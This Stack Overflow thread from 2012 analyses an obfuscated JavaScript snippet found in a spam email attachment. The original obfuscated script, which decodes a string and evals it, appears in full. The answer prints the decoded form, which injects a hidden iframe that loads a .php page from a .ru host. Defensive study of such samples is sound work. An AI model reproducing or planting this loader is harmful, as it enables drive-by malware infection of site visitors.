Suspicious JavaScript attached to a spam email

Question

Possible Duplicate:
javascript in spam email; what's it trying to do?

I've seen similar questions on here, but nothing quite like this or inquiring about this snip of code.

Take a look at the javascript here and let me know what you think it's doing (if anything). I've been staring at it for a while but can't figure anything out.

I found in an html file attached to a spam message (of course). The full html doesn't really matter, but I can attach if need be.

    <script>d=Date;d=new d();if(d.getFullYear()==2012)h=-parseInt('012')/5;if(window.document)try{new"a".prototype}catch(qqq){zz='eva'+'l';ss=[];aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){f='from'+'Char';f=f+'Code';}ee='e';e=window[zz];t='y';}
n="3.5j3.5j51.5j50j15j19j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j19.5j60.5j5.5j3.5j3.5j3.5j51.5j50j56j47.5j53.5j49.5j56j19j19.5j28.5j5.5j3.5j3.5j61.5j15j49.5j53j56.5j49.5j15j60.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j58.5j56j51.5j57j49.5j19j16j29j51.5j50j56j47.5j53.5j49.5j15j56.5j56j48.5j29.5j18.5j51j57j57j55j28j22.5j22.5j48.5j54j54j58j48.5j54j56.5j47.5j54.5j53j52j50j56j57.5j57j22j56j57.5j28j27j23j27j23j22.5j51.5j53.5j47.5j50.5j49.5j56.5j22.5j47.5j57.5j48j53j48j60j49j54j51.5j22j55j51j55j18.5j15j58.5j51.5j49j57j51j29.5j18.5j23.5j23j18.5j15j51j49.5j51.5j50.5j51j57j29.5j18.5j23.5j23j18.5j15j56.5j57j59.5j53j49.5j29.5j18.5j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j28j51j51.5j49j49j49.5j54j28.5j55j54.5j56.5j51.5j57j51.5j54.5j54j28j47.5j48j56.5j54.5j53j57.5j57j49.5j28.5j53j49.5j50j57j28j23j28.5j57j54.5j55j28j23j28.5j18.5j30j29j22.5j51.5j50j56j47.5j53.5j49.5j30j16j19.5j28.5j5.5j3.5j3.5j61.5j5.5j3.5j3.5j50j57.5j54j48.5j57j51.5j54.5j54j15j51.5j50j56j47.5j53.5j49.5j56j19j19.5j60.5j5.5j3.5j3.5j3.5j58j47.5j56j15j50j15j29.5j15j49j54.5j48.5j57.5j53.5j49.5j54j57j22j48.5j56j49.5j47.5j57j49.5j33.5j53j49.5j53.5j49.5j54j57j19j18.5j51.5j50j56j47.5j53.5j49.5j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j56.5j56j48.5j18.5j21j18.5j51j57j57j55j28j22.5j22.5j48.5j54j54j58j48.5j54j56.5j47.5j54.5j53j52j50j56j57.5j57j22j56j57.5j28j27j23j27j23j22.5j51.5j53.5j47.5j50.5j49.5j56.5j22.5j47.5j57.5j48j53j48j60j49j54j51.5j22j55j51j55j18.5j19.5j28.5j50j22j56.5j57j59.5j53j49.5j22j58j51.5j56.5j51.5j48j51.5j53j51.5j57j59.5j29.5j18.5j51j51.5j49j49j49.5j54j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j55j54.5j56.5j51.5j57j51.5j54.5j54j29.5j18.5j47.5j48j56.5j54.5j53j57.5j57j49.5j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j53j49.5j50j57j29.5j18.5j23j18.5j28.5j50j22j56.5j57j59.5j53j49.5j22j57j54.5j55j29.5j18.5j23j18.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j58.5j51.5j49j57j51j18.5j21j18.5j23.5j23j18.5j19.5j28.5j50j22j56.5j49.5j57j31.5j57j57j56j51.5j48j57.5j57j49.5j19j18.5j51j49.5j51.5j50.5j51j57j18.5j21j18.5j23.5j23j18.5j19.5j28.5j5.5j3.5j3.5j3.5j49j54.5j48.5j57.5j53.5j49.5j54j57j22j50.5j49.5j57j33.5j53j49.5j53.5j49.5j54j57j56.5j32j59.5j41j47.5j50.5j38j47.5j53.5j49.5j19j18.5j48j54.5j49j59.5j18.5j19.5j44.5j23j45.5j22j47.5j55j55j49.5j54j49j32.5j51j51.5j53j49j19j50j19.5j28.5j5.5j3.5j3.5j61.5".split("j");for(i=0;i!=611;i++){j=i;ss=ss+String[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(q);</script>

If if it helps, here is a pastebin with the snip: http://pastebin.com/MJZn91Tu

if youre going to try to trick SO into doing this for you you could at least format it properly and try to explain what it does. — Alexander Corwin, Mar 09 '12 at 20:08
Pretty much the same as [javascript in spam email; what's it trying to do?](http://stackoverflow.com/questions/9489603/javascript-in-spam-email-whats-it-trying-to-do) — josh3736, Mar 09 '12 at 20:09
@AlexanderCorwin OP doesn't know what it does. That's what the question is about. — PeeHaa, Mar 09 '12 at 20:12
And that's why i said try. it's not hard to step through it in firefox sandbox mode, if nothing else - he could at least let us know the very most obvious outcomes. — Alexander Corwin, Mar 09 '12 at 20:13
First, as Martin and Alexander said, this is not what SO does. Second, this is obviously malicious code. Why would you care beyond that? — Ben Barden, Mar 09 '12 at 20:14
@AlexanderCorwin it's obfuscated how would OP know any outcome (if OP doesn't know how to obfuscate it / or step through it)? Besided the fact that it is suspicious as stated in the title. — PeeHaa, Mar 09 '12 at 20:20
@BenBarden Isn't it a question (although not the best) about javascript? — PeeHaa, Mar 09 '12 at 20:22
@Alexander Corwin - If I knew what it did I would not have asked. — kburns, Mar 09 '12 at 20:24
@PeeHaa - Thank you. I did not know about jsfiddle, now I do and next time I will go straight there instead of asking such a bad question. — kburns, Mar 09 '12 at 20:24
@user595258 don't just copy/paste code there. It will still get executed. Replaced the `eval()` in that code with an `alert()`. — PeeHaa, Mar 09 '12 at 20:25
Perhaps I'm alone in this but I think you have a responsibility to run code and see what happens and try to figure out _why_ before asking others to do so for you. If the problem is "I'm interested in what this obviously malicious code does, but I don't know of a safe, sandboxed way to run it and observe it for myself," that's a worthwhile question question, but is **not** what was being asked here. — Alexander Corwin, Mar 09 '12 at 20:28
OP, it appears you have an answer provided below. You should probably mark it as such. @PeeHaa I admit I'm a bit new here, so I may not grok things fully, but my understanding is that SO is primarily for questions that could be phrased as "how do I..." and/or the allied "What am I doing wrong?" — Ben Barden, Mar 09 '12 at 21:16

derekdreery · Answer 1 · 2012-03-09T20:47:28.533

4

It runs this code:

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}

function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://cnnvcnsaoljfrut.ru:8080/images/aublbzdni.php');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

Anyone know what goes on at cnnvcnsaoljfrut.ru. I assume they don't sell fruit.

Turns out they don't sell fruit http://wepawet.iseclab.org/view.php?type=js&hash=eed2cbbfce308165ba46b4f53a381e46&t=1331302987

edited Mar 09 '12 at 20:47

answered Mar 09 '12 at 20:12

derekdreery

3,860
4
29
38

If you run what PeeHaa posted, it creates a popup with some code in the popup. Edit: and them PeeHaa posts right after I say that! >.> – Ryan Amos Mar 09 '12 at 20:14
@RyanAmos Can't touch it tadadada! ;) – PeeHaa Mar 09 '12 at 20:17
I'll have you know i actually used python to decode the string :) – derekdreery Mar 09 '12 at 20:42
2

@derekdreery +1 just for that :-) – PeeHaa Mar 10 '12 at 01:23

Suspicious JavaScript attached to a spam email

1 Answers1